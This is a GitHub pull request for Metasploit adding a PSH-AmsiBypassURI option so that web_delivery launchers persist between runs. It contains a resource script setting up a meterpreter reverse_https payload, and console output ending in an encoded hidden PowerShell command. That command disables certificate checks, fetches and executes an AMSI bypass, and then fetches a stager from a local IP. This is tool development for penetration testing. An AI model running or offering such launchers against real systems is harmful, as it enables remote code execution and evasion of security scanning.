Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add PSH-AmsiBypassURI option to allow persistent web_delivery #13063

Merged
merged 1 commit into from
Mar 13, 2020
Merged

Add PSH-AmsiBypassURI option to allow persistent web_delivery #13063

merged 1 commit into from
Mar 13, 2020

Conversation

timwr
Copy link
Contributor

@timwr timwr commented Mar 12, 2020
edited by bwatters-r7
Loading

This change adds a PSH-AmsiBypassURI option that allows web_delivery to be persistent between runs.
Fixes #13046

Verification

$ cat winweb.rc
use exploit/multi/script/web_delivery
set SRVHOST 192.168.56.1
set LHOST 192.168.56.1
set LPORT 4444
set target 2
set URIPATH /uri
set PSH-AmsiBypassURI /amsi_get_out_of_my_way
set SSL true
set payload windows/x64/meterpreter/reverse_https
# not sure if these are needed
set AutoLoadStdapi false
set AutoVerifySession false
set AutoSystemInfo false

exploit

$ ./msfconsole -qr winweb.rc
[*] Processing winweb.rc for ERB directives.
resource (winweb.rc)> use exploit/multi/script/web_delivery
resource (winweb.rc)> set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
resource (winweb.rc)> set LHOST 192.168.56.1
LHOST => 192.168.56.1
resource (winweb.rc)> set LPORT 4444
LPORT => 4444
resource (winweb.rc)> set target 2
target => 2
resource (winweb.rc)> set URIPATH /uri
URIPATH => /uri
resource (winweb.rc)> set PSH-AmsiBypassURI /amsi_get_out_of_my_way
PSH-AmsiBypassURI => /amsi_get_out_of_my_way
resource (winweb.rc)> set SSL true
SSL => true
resource (winweb.rc)> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
resource (winweb.rc)> set AutoLoadStdapi false
AutoLoadStdapi => false
resource (winweb.rc)> set AutoVerifySession false
AutoVerifySession => false
resource (winweb.rc)> set AutoSystemInfo false
AutoSystemInfo => false
resource (winweb.rc)> exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) >
[*] Started HTTPS reverse handler on https://192.168.56.1:4444
[*] Using URL: https://192.168.56.1:8080/uri
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAEIALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABCAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQA6ADgAMAA4ADAALwB1AHIAaQAvAGEAbQBzAGkAXwBnAGUAdABfAG8AdQB0AF8AbwBmAF8AbQB5AF8AdwBhAHkAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADEAOgA4ADAAOAAwAC8AdQByAGkAJwApACkAOwA=

Verify:

  • The powershell command is the same each time you run the script
  • 馃悮 (don't forget to meterpreter > load stdapi)

@timwr timwr mentioned this pull request Mar 12, 2020
Closed
4 tasks
@bwatters-r7 bwatters-r7 self-assigned this Mar 13, 2020
@bwatters-r7 bwatters-r7 merged commit c21b90e into rapid7:master Mar 13, 2020
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Mar 13, 2020
edited by tdoan-r7
Loading

Release notes

This fixes an issue where persistence was not well-supported by the PowerShell amsi bypass option.

@tdoan-r7 tdoan-r7 added rn-enhancement release notes enhancement rn-fix release notes fix and removed rn-enhancement release notes enhancement labels Apr 1, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
enhancement rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Web_Delivery 2 stage payload, reliable but not feasible for persistence
4 participants
@timwr @bwatters-r7 @tdoan-r7 @acammack-r7